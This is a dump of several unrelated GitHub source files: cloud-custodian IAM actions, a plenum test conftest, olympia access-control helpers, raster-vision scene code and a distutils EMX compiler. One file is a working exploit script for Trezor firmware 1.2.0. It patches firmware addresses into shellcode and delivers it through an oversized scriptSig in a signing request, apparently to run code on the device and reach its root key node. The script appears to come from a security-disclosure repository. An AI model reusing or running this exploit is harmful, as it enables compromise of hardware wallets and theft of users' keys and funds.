                UserName=r['UserName'], SSHPublicKeyId=key['SSHPublicKeyId'])

    @staticmethod
    def delete_signing_certificates(client, r):
        """Delete every signing certificate uploaded by the user."""
        response = client.list_signing_certificates(UserName=r['UserName'])
        for cert in response.get('Certificates', ()):
            client.delete_signing_certificate(
                UserName=r['UserName'], CertificateId=cert['CertificateId'])

    @staticmethod
    def delete_service_specific_credentials(client, r):
        # Service specific user credentials (codecommit)
        response = client.list_service_specific_credentials(UserName=r['UserName'])
        for screds in response.get('ServiceSpecificCredentials', ()):
            client.delete_service_specific_credential(
                UserName=r['UserName'],
                ServiceSpecificCredentialId=screds['ServiceSpecificCredentialId'])

    @staticmethod
    def delete_user(client, r):
        """Delete the user itself (assumes attached entities are gone)."""
        client.delete_user(UserName=r['UserName'])

    def process(self, resources):
        client = local_session(self.manager.session_factory).client('iam')
        self.log.debug('Deleting user %s options: %s' %
            (len(resources), self.data.get('options', 'all')))
        for r in resources:
            self.process_user(client, r)

    def process_user(self, client, r):
        """Apply the selected delete options (or full deletion) to one user."""
        # Copy before expanding compound options: ``self.data`` is the shared
        # policy configuration, and the previous in-place ``+=`` mutated the
        # stored options list, growing it once per processed resource.
        user_options = list(
            self.data.get('options', self.ORDERED_OPTIONS))
        # resolve compound options
        for cmd in self.COMPOUND_OPTIONS:
            if cmd in user_options:
                user_options += self.COMPOUND_OPTIONS[cmd]
        # process options in ordered fashion
        for cmd in self.ORDERED_OPTIONS:
            if cmd in user_options:
                op = getattr(self, self.ORDERED_OPTIONS[cmd])
                op(client, r)
        # Only delete the user itself when no explicit options were given.
        if not self.data.get('options'):
            self.delete_user(client, r)
@User.action_registry.register('remove-keys')
class UserRemoveAccessKey(BaseAction):
    """Delete or disable user's access keys.

    For example if we wanted to disable keys after 90 days of non-use and
    delete them after 180 days of nonuse:

    :example:

    .. code-block:: yaml

        - name: iam-mfa-active-key-no-login
          resource: iam-user
          actions:
            - type: remove-keys
              disable: true
              age: 90
            - type: remove-keys
              age: 180
    """

    schema = type_schema(
        'remove-keys',
        matched={'type': 'boolean'},
        age={'type': 'number'},
        disable={'type': 'boolean'})
    permissions = ('iam:ListAccessKeys', 'iam:UpdateAccessKey',
                   'iam:DeleteAccessKey')

    def validate(self):
        """Reject configurations with conflicting key-selection criteria.

        Fix: both error messages previously contained a '%s' placeholder
        that was never interpolated, so users saw a literal '%s'.
        """
        if self.data.get('matched') and self.data.get('age'):
            raise PolicyValidationError(
                "policy cannot mix 'matched' and 'age' parameters")
        ftypes = {f.type for f in self.manager.iter_filters()}
        if 'credential' in ftypes and 'access-key' in ftypes:
            raise PolicyValidationError(
                "policy cannot mix 'credential' and 'access-key' filters w/ delete action")
        return self

    def process(self, resources):
        client = local_session(self.manager.session_factory).client('iam')
        age = self.data.get('age')
        disable = self.data.get('disable')
        matched = self.data.get('matched')
        if age:
            # 'age' is a number of days (timedelta's first positional arg).
            threshold_date = datetime.datetime.now(tz=tzutc()) - timedelta(age)
        for r in resources:
            if 'c7n:AccessKeys' not in r:
                r['c7n:AccessKeys'] = client.list_access_keys(
                    UserName=r['UserName'])['AccessKeyMetadata']
            keys = r['c7n:AccessKeys']
            if matched:
                # Narrow to the keys matched by a preceding filter.
                m_keys = resolve_credential_keys(
                    r.get(CredentialReport.matched_annotation_key),
                    keys)
                assert m_keys, "shouldn't have gotten this far without keys"
                keys = m_keys
            for k in keys:
                if age:
                    # Keys newer than the threshold are left untouched.
                    if not k['CreateDate'] < threshold_date:
                        continue
                if disable:
                    client.update_access_key(
                        UserName=r['UserName'],
                        AccessKeyId=k['AccessKeyId'],
                        Status='Inactive')
                else:
                    client.delete_access_key(
                        UserName=r['UserName'],
                        AccessKeyId=k['AccessKeyId'])
def resolve_credential_keys(m_keys, keys):
    """Map credential-report matches back onto live access-key metadata.

    Matches tagged 'credential' are correlated to an entry of ``keys`` by
    creation time (the report's ``last_rotated`` equals the key's
    ``CreateDate``); other matches pass through unchanged. Duplicates are
    dropped while preserving first-seen order.
    """
    resolved = []
    for matched in m_keys:
        if matched['c7n:match-type'] != 'credential':
            if matched not in resolved:
                resolved.append(matched)
            continue
        rotated = parse_date(matched['last_rotated'])
        for access_key in keys:
            if rotated == access_key['CreateDate']:
                access_key = dict(access_key)
                access_key['c7n:match-type'] = 'access'
                if access_key not in resolved:
                    resolved.append(access_key)
    return resolved
#################
# IAM Groups #
#################
@Group.filter_registry.register('has-users')
class IamGroupUsers(Filter):
    """Filter IAM groups that have users attached based on True/False value:

    True: Filter all IAM groups with users assigned to it
    False: Filter all IAM groups without any users assigned to it

    :example:

    .. code-block:: yaml

        - name: empty-iam-group
          resource: iam-group
          filters:
            - type: has-users
              value: False
    """

    schema = type_schema('has-users', value={'type': 'boolean'})
    permissions = ('iam:GetGroup',)

    def _user_count(self, client, resource):
        # Number of users currently in the group.
        members = client.get_group(GroupName=resource['GroupName'])['Users']
        return len(members)

    def process(self, resources, events=None):
        client = local_session(self.manager.session_factory).client('iam')
        if self.data.get('value', True):
            return [r for r in resources if self._user_count(client, r) > 0]
        return [r for r in resources if self._user_count(client, r) == 0]
@Group.filter_registry.register('has-inline-policy')
class IamGroupInlinePolicy(Filter):
    """Filter IAM groups that have an inline-policy based on boolean value:

    True: Filter all groups that have an inline-policy attached
    False: Filter all groups that do not have an inline-policy attached

    :example:

    .. code-block:: yaml

        - name: iam-groups-with-inline-policy
          resource: iam-group
          filters:
            - type: has-inline-policy
              value: True
    """

    schema = type_schema('has-inline-policy', value={'type': 'boolean'})
    permissions = ('iam:ListGroupPolicies',)

    def _inline_policies(self, client, resource):
        # Annotate the group with its inline policy names.
        resource['c7n:InlinePolicies'] = client.list_group_policies(
            GroupName=resource['GroupName'])['PolicyNames']
        return resource

    def process(self, resources, events=None):
        client = local_session(self.manager.session_factory).client('iam')
        want_inline = self.data.get('value', True)
        matched = []
        for resource in resources:
            resource = self._inline_policies(client, resource)
            inline_count = len(resource['c7n:InlinePolicies'])
            if inline_count > 0 and want_inline:
                matched.append(resource)
            elif inline_count == 0 and not want_inline:
                matched.append(resource)
        return matched
|
{
"content_hash": "afa04e7ab3c14bf60fa6469c566fe269",
"timestamp": "",
"source": "github",
"line_count": 2006,
"max_line_length": 99,
"avg_line_length": 32.98354935194417,
"alnum_prop": 0.5734451749414343,
"repo_name": "Sutto/cloud-custodian",
"id": "1f6bdd0c6828feda6a2540a1b1db09471d8fb529",
"size": "66755",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "c7n/resources/iam.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "7986"
},
{
"name": "Go",
"bytes": "146630"
},
{
"name": "HTML",
"bytes": "31"
},
{
"name": "Makefile",
"bytes": "9971"
},
{
"name": "PowerShell",
"bytes": "1804"
},
{
"name": "Python",
"bytes": "5283859"
},
{
"name": "Shell",
"bytes": "12627"
},
{
"name": "Smarty",
"bytes": "359"
}
],
"symlink_target": ""
}
|
from trezorlib import *
from trezorlib.client import TrezorClient
from trezorlib.transport_hid import HidTransport
import trezorlib.messages_pb2 as proto
import trezorlib.types_pb2 as types
import binascii
# 1.2.0
# Function addresses inside the target firmware (version 1.2.0).
getRootNode = 0x080108c0
oledClear = 0x0801af38
oledDrawString = 0x0801b0fc
oledRefresh = 0x0801af48
# Shellcode payload: raw bytes of hax.o starting at offset 0x34
# (presumably skipping the ELF header straight to the code — confirm
# against the object file layout).
fic = open("hax.o", "rb")
shell = bytearray(fic.read()[0x34:0x100])
fic.close()
# Add 1 to each address, i.e. set the low bit — NOTE(review): this looks
# like the ARM Thumb-mode bit for indirect branches; verify.
getRootNode+=1
oledClear+=1
oledDrawString+=1
oledRefresh+=1
# Patch the four firmware addresses into the last 16 bytes of the
# shellcode, little-endian, laid out (from the end backwards):
# [getRootNode][oledClear][oledDrawString][oledRefresh]
shell[len(shell) - 4] = (oledRefresh & 0xff)
shell[len(shell) - 3] = ((oledRefresh >> 8) & 0xff)
shell[len(shell) - 2] = ((oledRefresh >> 16) & 0xff)
shell[len(shell) - 1] = ((oledRefresh >> 24) & 0xff)
shell[len(shell) - 8] = (oledDrawString & 0xff)
shell[len(shell) - 7] = ((oledDrawString >> 8) & 0xff)
shell[len(shell) - 6] = ((oledDrawString >> 16) & 0xff)
shell[len(shell) - 5] = ((oledDrawString >> 24) & 0xff)
shell[len(shell) - 12] = (oledClear & 0xff)
shell[len(shell) - 11] = ((oledClear >> 8) & 0xff)
shell[len(shell) - 10] = ((oledClear >> 16) & 0xff)
shell[len(shell) - 9] = ((oledClear >> 24) & 0xff)
shell[len(shell) - 16] = (getRootNode & 0xff)
shell[len(shell) - 15] = ((getRootNode >> 8) & 0xff)
shell[len(shell) - 14] = ((getRootNode >> 16) & 0xff)
shell[len(shell) - 13] = ((getRootNode >> 24) & 0xff)
shell = str(shell)
print binascii.hexlify(shell)
# Build the oversized scriptSig: the shellcode padded to DUMMY_SIZE bytes
# with the repeated 4-byte word below (firmware-1.2.0 specific — presumably
# an address pointing into the payload; confirm).
DUMMY_SIZE = 500
SEQ = 0x01234567
SIG_DUMMY = shell
SIG_DUMMY += "\x63\xfd\x01\x20" * ((DUMMY_SIZE - len(shell)) / 4) # 1.2.0
# Connect to the first attached Trezor over HID.
devices = HidTransport.enumerate()
client = TrezorClient(HidTransport(devices[0]))
client.transport.session_begin()
# Start a signing flow claiming one input and one output.
tx = proto.SignTx()
tx.inputs_count = 1
tx.outputs_count = 1
tx.coin_name = "Bitcoin"
res = client.call(tx)
if isinstance(res, proto.Failure):
    raise CallException("Signing failed")
if not isinstance(res, proto.TxRequest):
    raise CallException("Unexpected message")
print res
# Answer the device's first TxRequest with an input whose script_sig is the
# oversized SIG_DUMMY payload built above.
msg = types.TransactionType()
testInput = types.TxInputType(address_n=[0],
                    prev_hash=binascii.unhexlify('d5f65ee80147b4bcc70b75e4bbf2d7382021b871bd8867ef8fa525ef50864882'),
                    prev_index=0,
                    script_sig=SIG_DUMMY,
                    sequence=SEQ
)
msg.inputs.extend([ testInput ])
res = client.call(proto.TxAck(tx = msg))
if isinstance(res, proto.Failure):
    raise CallException("Signing failed")
if not isinstance(res, proto.TxRequest):
    raise CallException("Unexpected message")
print res
# Provide the (previous) transaction metadata the device asks for next.
msg = types.TransactionType()
msg.version = 1
msg.lock_time = 0
msg.inputs_cnt = 1
msg.outputs_cnt = 0
res = client.call(proto.TxAck(tx = msg))
if isinstance(res, proto.Failure):
    raise CallException("Signing failed")
if not isinstance(res, proto.TxRequest):
    raise CallException("Unexpected message")
print res
# Send the same oversized input again; the '# bye' below marks the call on
# which the device is expected to stop behaving normally.
msg = types.TransactionType()
testInput = types.TxInputType(address_n=[0],
                    prev_hash=binascii.unhexlify('d5f65ee80147b4bcc70b75e4bbf2d7382021b871bd8867ef8fa525ef50864882'),
                    prev_index=0,
                    script_sig=SIG_DUMMY,
                    sequence=SEQ
)
msg.inputs.extend([ testInput ])
res = client.call(proto.TxAck(tx = msg)) # bye
if isinstance(res, proto.Failure):
    raise CallException("Signing failed")
if not isinstance(res, proto.TxRequest):
    raise CallException("Unexpected message")
print res
|
{
"content_hash": "0b1cc64508253322a75d02461211be1c",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 126,
"avg_line_length": 26.841269841269842,
"alnum_prop": 0.6655824955647546,
"repo_name": "btchip/trezor-security-exploits",
"id": "39fd34c52e72e5ed6e69973f8fefe9624554ff55",
"size": "3614",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "1.2.0-scriptSigExploit/scriptSigExploit.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "1620"
},
{
"name": "Python",
"bytes": "10985"
}
],
"symlink_target": ""
}
|
import functools
import pytest
from plenum.common.average_strategies import MedianLowStrategy
from plenum.server.instances import Instances
from plenum.server.monitor import Monitor
from plenum.test.helper import sdk_eval_timeout, sdk_send_random_request, sdk_get_reply
from plenum.test.testing_utils import FakeSomething
@pytest.fixture()
def requests(looper, sdk_wallet_client, sdk_pool_handle):
    """Send five random requests through the pool and return them."""
    collected = []
    for _ in range(5):
        request = sdk_send_random_request(looper, sdk_pool_handle, sdk_wallet_client)
        request, _reply = sdk_get_reply(looper, request, timeout=sdk_eval_timeout(1, 4))
        collected.append(request)
    return collected
@pytest.fixture
def decreasedMonitoringTimeouts(tconf, request):
    """Temporarily set DashboardUpdateFreq to 1, restoring it on teardown."""
    saved_freq = tconf.DashboardUpdateFreq
    tconf.DashboardUpdateFreq = 1

    def restore():
        tconf.DashboardUpdateFreq = saved_freq

    request.addfinalizer(restore)
    return tconf
@pytest.fixture(scope='function')
def fake_monitor(tconf):
    """Build a lightweight Monitor stand-in with real Monitor methods bound
    onto a FakeSomething, backed by 5 replica throughput trackers."""
    # Accessor bound onto the fake in place of Monitor's own getThroughput.
    def getThroughput(self, instId):
        return self.throughputs[instId].throughput
    throughputs = dict()
    instances = Instances()
    num_of_replicas = 5
    for i in range(num_of_replicas):
        throughputs[i] = Monitor.create_throughput_measurement(tconf)
        instances.add(i)
    monitor = FakeSomething(
        throughputs=throughputs,
        instances=instances,
        Delta=tconf.DELTA,
        throughput_avg_strategy_cls=MedianLowStrategy,
    )
    # Pretend every replica has already ordered some requests.
    monitor.numOrderedRequests = dict()
    for i in range(num_of_replicas):
        monitor.numOrderedRequests[i] = (100, 100)
    # Bind the real Monitor methods to the fake so they see its attributes.
    monitor.getThroughputs = functools.partial(Monitor.getThroughputs, monitor)
    monitor.getThroughput = functools.partial(getThroughput, monitor)
    monitor.getInstanceMetrics = functools.partial(Monitor.getInstanceMetrics, monitor)
    monitor.instance_throughput_ratio = functools.partial(Monitor.instance_throughput_ratio, monitor)
    monitor.is_instance_throughput_too_low = functools.partial(Monitor.is_instance_throughput_too_low, monitor)
    monitor.addInstance = functools.partial(Monitor.addInstance, monitor)
    return monitor
|
{
"content_hash": "0f981f84b7c82a05ff0df90630d15a74",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 111,
"avg_line_length": 35.78333333333333,
"alnum_prop": 0.7377736376339078,
"repo_name": "evernym/zeno",
"id": "c408b76b01480a3be2a935dc56f0b44ee213516f",
"size": "2147",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "plenum/test/monitoring/conftest.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "531061"
}
],
"symlink_target": ""
}
|
from olympia import amo
def match_rules(rules, app, action):
    """
    This will match rules found in Group.

    ``rules`` is a comma-separated list of ``app:action`` pairs; '*'
    wildcards either side, and querying with action '%' matches any action.
    """
    for rule in rules.split(','):
        rule_app, rule_action = rule.split(':')
        app_ok = rule_app in ('*', app)
        action_ok = rule_action in ('*', action) or action == '%'
        if app_ok and action_ok:
            return True
    return False
def action_allowed(request, app, action):
    """
    Determines if the request user has permission to do a certain action

    'Admin:%' is true if the user has any of:
    ('Admin:*', 'Admin:%s'%whatever, '*:*',) as rules.
    """
    groups = getattr(request, 'groups', ())
    return any(match_rules(group.rules, app, action) for group in groups)
def action_allowed_user(user, app, action):
    """Similar to action_allowed, but takes user instead of request."""
    return any(match_rules(group.rules, app, action)
               for group in user.groups.all())
def submission_allowed(user, parsed_addon_data):
    """Experiments can only be submitted by the people with the right group.

    See bug 1220097.
    """
    if not parsed_addon_data.get('is_experiment', False):
        return True
    return action_allowed_user(user, 'Experiments', 'submit')
def check_ownership(request, obj, require_owner=False, require_author=False,
                    ignore_disabled=False, admin=True):
    """
    A convenience function. Check if request.user has permissions
    for the object, delegating to the object's own ``check_ownership``
    when it defines one; objects without it are never owned.
    """
    if not hasattr(obj, 'check_ownership'):
        return False
    return obj.check_ownership(request, require_owner=require_owner,
                               require_author=require_author,
                               ignore_disabled=ignore_disabled,
                               admin=admin)
def check_collection_ownership(request, collection, require_owner=False):
    """Check whether the request user may act on the collection."""
    if not request.user.is_authenticated():
        return False
    if action_allowed(request, 'Admin', '%'):
        return True
    if action_allowed(request, 'Collections', 'Edit'):
        return True
    if request.user.id == collection.author_id:
        return True
    if require_owner:
        return False
    return collection.publishable_by(request.user)
def check_addon_ownership(request, addon, viewer=False, dev=False,
                          support=False, admin=True, ignore_disabled=False):
    """
    Check request.user's permissions for the addon.

    If user is an admin they can do anything.
    If the add-on is disabled only admins have permission.
    If they're an add-on owner they can do anything.
    dev=True checks that the user has an owner or developer role.
    viewer=True checks that the user has an owner, developer, or viewer role.
    support=True checks that the user has a support role.
    """
    if not request.user.is_authenticated():
        return False
    # Deleted addons can't be edited at all.
    if addon.is_deleted:
        return False
    # Users with 'Addons:Edit' can do anything.
    if admin and action_allowed(request, 'Addons', 'Edit'):
        return True
    # Only admins can edit admin-disabled addons.
    if addon.status == amo.STATUS_DISABLED and not ignore_disabled:
        return False
    # Addon owners can do everything else.
    roles = (amo.AUTHOR_ROLE_OWNER,)
    if dev:
        roles += (amo.AUTHOR_ROLE_DEV,)
    # Viewer privs are implied for devs.
    elif viewer:
        roles += (amo.AUTHOR_ROLE_DEV, amo.AUTHOR_ROLE_VIEWER,
                  amo.AUTHOR_ROLE_SUPPORT)
    # Support can do support.
    elif support:
        roles += (amo.AUTHOR_ROLE_SUPPORT,)
    # True iff the user authored the addon with one of the accepted roles.
    return addon.authors.filter(pk=request.user.pk,
                                addonuser__role__in=roles).exists()
def check_addons_reviewer(request):
    """Return whether the request user holds the 'Addons:Review' permission."""
    return action_allowed(request, 'Addons', 'Review')
def check_unlisted_addons_reviewer(request):
    """Return whether the request user holds 'Addons:ReviewUnlisted'."""
    return action_allowed(request, 'Addons', 'ReviewUnlisted')
def check_personas_reviewer(request):
    """Return whether the request user holds the 'Personas:Review' permission."""
    return action_allowed(request, 'Personas', 'Review')
def is_editor(request, addon):
    """Return True if the user is an addons reviewer, or a personas reviewer
    and the addon is a persona."""
    if check_addons_reviewer(request):
        return True
    return check_personas_reviewer(request) and addon.is_persona()
|
{
"content_hash": "38636c398593abfac499338ba965b7d0",
"timestamp": "",
"source": "github",
"line_count": 131,
"max_line_length": 77,
"avg_line_length": 33.656488549618324,
"alnum_prop": 0.627126332501701,
"repo_name": "jpetto/olympia",
"id": "81c658bcff50ad1d13c1a999bb18e7600dce5cf6",
"size": "4409",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/olympia/access/acl.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "249"
},
{
"name": "CSS",
"bytes": "665496"
},
{
"name": "HTML",
"bytes": "1606994"
},
{
"name": "JavaScript",
"bytes": "1315514"
},
{
"name": "Makefile",
"bytes": "4235"
},
{
"name": "PLSQL",
"bytes": "74"
},
{
"name": "Python",
"bytes": "4026490"
},
{
"name": "Shell",
"bytes": "9145"
},
{
"name": "Smarty",
"bytes": "1930"
}
],
"symlink_target": ""
}
|
from typing import List
from shapely.geometry import Polygon, mapping, shape
from rastervision.core.box import Box
from rastervision.core.data import (
ClassConfig, CRSTransformer, GeoJSONVectorSourceConfig, RasterioSource,
RasterizedSource, Scene, SemanticSegmentationLabelSource,
transform_geojson, geometries_to_geojson)
def make_scene(scene_id: str, class_config: ClassConfig, img_info: dict,
               labels_uri: str, aoi_polygons: List[Polygon]) -> Scene:
    """Assemble a Scene from imagery info, a labels URI and AOI polygons."""
    raster_source = make_raster_source(img_info)
    extent = raster_source.get_extent()
    crs_transformer = raster_source.get_crs_transformer()
    label_source = make_label_source(
        labels_uri=labels_uri,
        class_config=class_config,
        extent=extent,
        crs_transformer=crs_transformer)
    # transform AOI to pixel coords
    pixel_aois = aoi_to_pixel_coords(aoi_polygons, crs_transformer)
    return Scene(
        id=scene_id,
        raster_source=raster_source,
        ground_truth_label_source=label_source,
        aoi_polygons=pixel_aois)
def make_raster_source(img_info: dict) -> RasterioSource:
    """Build an RGB RasterioSource from the image's ingest location(s)."""
    img_uri = img_info['ingestLocation']
    uris = img_uri if isinstance(img_uri, list) else [img_uri]
    return RasterioSource(uris=uris, channel_order=[0, 1, 2])
def make_label_source(
        labels_uri: str, class_config: ClassConfig, extent: Box,
        crs_transformer: CRSTransformer) -> SemanticSegmentationLabelSource:
    """Build a segmentation label source by rasterizing GeoJSON labels."""
    vector_source = GeoJSONVectorSourceConfig(
        uri=labels_uri, default_class_id=1,
        ignore_crs_field=True).build(class_config, crs_transformer)
    rasterized = RasterizedSource(
        vector_source=vector_source,
        background_class_id=0,
        extent=extent,
        crs_transformer=crs_transformer)
    return SemanticSegmentationLabelSource(
        raster_source=rasterized, null_class_id=0)
def aoi_to_pixel_coords(aoi_polygons: List[Polygon],
                        crs_transformer: CRSTransformer) -> List[Polygon]:
    """Transform AOI to pixel coordinates"""
    geojson = geometries_to_geojson([mapping(poly) for poly in aoi_polygons])
    pixel_geojson = transform_geojson(geojson, crs_transformer)
    return [shape(feature['geometry'])
            for feature in pixel_geojson['features']]
|
{
"content_hash": "8a12e399e2c6de204664275e9400713f",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 76,
"avg_line_length": 36.661764705882355,
"alnum_prop": 0.690734055354994,
"repo_name": "azavea/raster-foundry",
"id": "c25643e82428333ce7181998b944192480132627",
"size": "2493",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "app-hitl/hitl/src/hitl/rv/data.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "111670"
},
{
"name": "HTML",
"bytes": "189623"
},
{
"name": "JavaScript",
"bytes": "499670"
},
{
"name": "Nginx",
"bytes": "1202"
},
{
"name": "Python",
"bytes": "132877"
},
{
"name": "Ruby",
"bytes": "1272"
},
{
"name": "Scala",
"bytes": "991596"
},
{
"name": "Shell",
"bytes": "37380"
}
],
"symlink_target": ""
}
|
"""distutils.emxccompiler
Provides the EMXCCompiler class, a subclass of UnixCCompiler that
handles the EMX port of the GNU C compiler to OS/2.
"""
# issues:
#
# * OS/2 insists that DLLs can have names no longer than 8 characters
# We put export_symbols in a def-file, as though the DLL can have
# an arbitrary length name, but truncate the output filename.
#
# * only use OMF objects and use LINK386 as the linker (-Zomf)
#
# * always build for multithreading (-Zmt) as the accompanying OS/2 port
# of Python is only distributed with threads enabled.
#
# tested configurations:
#
# * EMX gcc 2.81/EMX 0.9d fix03
__revision__ = "$Id$"
import os,sys,copy
from distutils.ccompiler import gen_preprocess_options, gen_lib_options
from distutils.unixccompiler import UnixCCompiler
from distutils.file_util import write_file
from distutils.errors import DistutilsExecError, CompileError, UnknownFileError
from distutils import log
class EMXCCompiler (UnixCCompiler):
    """CCompiler subclass for the EMX port of the GNU C compiler to OS/2.

    Produces OMF objects (-Zomf), always builds multithreaded (-Zmt), and
    handles OS/2-specific .def export files and .rc resource compilation.
    """

    compiler_type = 'emx'
    obj_extension = ".obj"
    static_lib_extension = ".lib"
    shared_lib_extension = ".dll"
    static_lib_format = "%s%s"
    shared_lib_format = "%s%s"
    res_extension = ".res"  # compiled resource file
    exe_extension = ".exe"

    def __init__ (self,
                  verbose=0,
                  dry_run=0,
                  force=0):
        """Set up gcc-based executables and warn if pyconfig.h looks
        incompatible with GCC."""

        UnixCCompiler.__init__ (self, verbose, dry_run, force)

        # Warn early if this Python was not built with (or for) GCC.
        (status, details) = check_config_h()
        self.debug_print("Python's GCC status: %s (details: %s)" %
                         (status, details))
        if status is not CONFIG_H_OK:
            self.warn(
                "Python's pyconfig.h doesn't seem to support your compiler. " +
                ("Reason: %s." % details) +
                "Compiling may fail because of undefined preprocessor macros.")

        (self.gcc_version, self.ld_version) = \
            get_versions()
        self.debug_print(self.compiler_type + ": gcc %s, ld %s\n" %
                         (self.gcc_version,
                          self.ld_version) )

        # Hard-code GCC because that's what this is all about.
        # XXX optimization, warnings etc. should be customizable.
        self.set_executables(compiler='gcc -Zomf -Zmt -O3 -fomit-frame-pointer -mprobe -Wall',
                             compiler_so='gcc -Zomf -Zmt -O3 -fomit-frame-pointer -mprobe -Wall',
                             linker_exe='gcc -Zomf -Zmt -Zcrtdll',
                             linker_so='gcc -Zomf -Zmt -Zcrtdll -Zdll')

        # want the gcc library statically linked (so that we don't have
        # to distribute a version dependent on the compiler we have)
        self.dll_libraries=["gcc"]

    # __init__ ()

    def _compile(self, obj, src, ext, cc_args, extra_postargs, pp_opts):
        """Compile one source file; '.rc' resources go through 'rc', all
        other sources through the C compiler."""
        if ext == '.rc':
            # gcc requires '.rc' compiled to binary ('.res') files !!!
            try:
                self.spawn(["rc", "-r", src])
            except DistutilsExecError, msg:
                raise CompileError, msg
        else: # for other files use the C-compiler
            try:
                self.spawn(self.compiler_so + cc_args + [src, '-o', obj] +
                           extra_postargs)
            except DistutilsExecError, msg:
                raise CompileError, msg

    def link (self,
              target_desc,
              objects,
              output_filename,
              output_dir=None,
              libraries=None,
              library_dirs=None,
              runtime_library_dirs=None,
              export_symbols=None,
              debug=0,
              extra_preargs=None,
              extra_postargs=None,
              build_temp=None,
              target_lang=None):
        """Link objects into a library/executable.

        For non-executable targets with export symbols, writes an OS/2
        .def file next to the objects and passes it to the linker instead
        of the usual export_symbols mechanism.
        """
        # use separate copies, so we can modify the lists
        extra_preargs = copy.copy(extra_preargs or [])
        libraries = copy.copy(libraries or [])
        objects = copy.copy(objects or [])

        # Additional libraries
        libraries.extend(self.dll_libraries)

        # handle export symbols by creating a def-file
        # with executables this only works with gcc/ld as linker
        if ((export_symbols is not None) and
            (target_desc != self.EXECUTABLE)):
            # (The linker doesn't do anything if output is up-to-date.
            # So it would probably better to check if we really need this,
            # but for this we had to insert some unchanged parts of
            # UnixCCompiler, and this is not what we want.)

            # we want to put some files in the same directory as the
            # object files are, build_temp doesn't help much
            # where are the object files
            temp_dir = os.path.dirname(objects[0])
            # name of dll to give the helper files the same base name
            (dll_name, dll_extension) = os.path.splitext(
                os.path.basename(output_filename))

            # generate the filenames for these files
            def_file = os.path.join(temp_dir, dll_name + ".def")

            # Generate .def file
            contents = [
                "LIBRARY %s INITINSTANCE TERMINSTANCE" % \
                os.path.splitext(os.path.basename(output_filename))[0],
                "DATA MULTIPLE NONSHARED",
                "EXPORTS"]
            for sym in export_symbols:
                contents.append(' "%s"' % sym)
            self.execute(write_file, (def_file, contents),
                         "writing %s" % def_file)

            # next add options for def-file and to creating import libraries
            # for gcc/ld the def-file is specified as any other object files
            objects.append(def_file)

        #end: if ((export_symbols is not None) and
        #        (target_desc != self.EXECUTABLE or self.linker_dll == "gcc")):

        # who wants symbols and a many times larger output file
        # should explicitly switch the debug mode on
        # otherwise we let dllwrap/ld strip the output file
        # (On my machine: 10KB < stripped_file < ??100KB
        #   unstripped_file = stripped_file + XXX KB
        #  ( XXX=254 for a typical python extension))
        if not debug:
            extra_preargs.append("-s")

        UnixCCompiler.link(self,
                           target_desc,
                           objects,
                           output_filename,
                           output_dir,
                           libraries,
                           library_dirs,
                           runtime_library_dirs,
                           None, # export_symbols, we do this in our def-file
                           debug,
                           extra_preargs,
                           extra_postargs,
                           build_temp,
                           target_lang)

    # link ()

    # -- Miscellaneous methods -----------------------------------------

    # override the object_filenames method from CCompiler to
    # support rc and res-files
    def object_filenames (self,
                          source_filenames,
                          strip_dir=0,
                          output_dir=''):
        """Map source filenames to object filenames; '.rc' sources map to
        '.res', everything else to '.obj'."""
        if output_dir is None: output_dir = ''
        obj_names = []
        for src_name in source_filenames:
            # use normcase to make sure '.rc' is really '.rc' and not '.RC'
            (base, ext) = os.path.splitext (os.path.normcase(src_name))
            if ext not in (self.src_extensions + ['.rc']):
                raise UnknownFileError, \
                      "unknown file type '%s' (from '%s')" % \
                      (ext, src_name)
            if strip_dir:
                base = os.path.basename (base)
            if ext == '.rc':
                # these need to be compiled to object files
                obj_names.append (os.path.join (output_dir,
                                                base + self.res_extension))
            else:
                obj_names.append (os.path.join (output_dir,
                                                base + self.obj_extension))
        return obj_names

    # object_filenames ()

    # override the find_library_file method from UnixCCompiler
    # to deal with file naming/searching differences
    def find_library_file(self, dirs, lib, debug=0):
        """Return the path of '<lib>.lib' (or rarely 'lib<lib>.lib') in
        'dirs' plus EMX's LIBRARY_PATH, or None if not found."""
        shortlib = '%s.lib' % lib
        longlib = 'lib%s.lib' % lib # this form very rare

        # get EMX's default library directory search path
        try:
            emx_dirs = os.environ['LIBRARY_PATH'].split(';')
        except KeyError:
            emx_dirs = []

        for dir in dirs + emx_dirs:
            shortlibp = os.path.join(dir, shortlib)
            longlibp = os.path.join(dir, longlib)
            if os.path.exists(shortlibp):
                return shortlibp
            elif os.path.exists(longlibp):
                return longlibp

        # Oops, didn't find it in *any* of 'dirs'
        return None
# class EMXCCompiler
# Because these compilers aren't configured in Python's pyconfig.h file by
# default, we should at least warn the user if he is using a unmodified
# version.

# Tri-state status codes returned by check_config_h() below.
CONFIG_H_OK = "ok"
CONFIG_H_NOTOK = "not ok"
CONFIG_H_UNCERTAIN = "uncertain"
def check_config_h():
    """Check if the current Python installation (specifically, pyconfig.h)
    appears amenable to building extensions with GCC.  Returns a tuple
    (status, details), where 'status' is one of the following constants:
      CONFIG_H_OK
        all is well, go ahead and compile
      CONFIG_H_NOTOK
        doesn't look good
      CONFIG_H_UNCERTAIN
        not sure -- unable to read pyconfig.h
    'details' is a human-readable string explaining the situation.

    Note there are two ways to conclude "OK": either 'sys.version' contains
    the string "GCC" (implying that this Python was built with GCC), or the
    installed "pyconfig.h" contains the string "__GNUC__".
    """

    # XXX since this function also checks sys.version, it's not strictly a
    # "pyconfig.h" check -- should probably be renamed...

    from distutils import sysconfig
    import string
    # if sys.version contains GCC then python was compiled with
    # GCC, and the pyconfig.h file should be OK
    if string.find(sys.version,"GCC") >= 0:
        return (CONFIG_H_OK, "sys.version mentions 'GCC'")

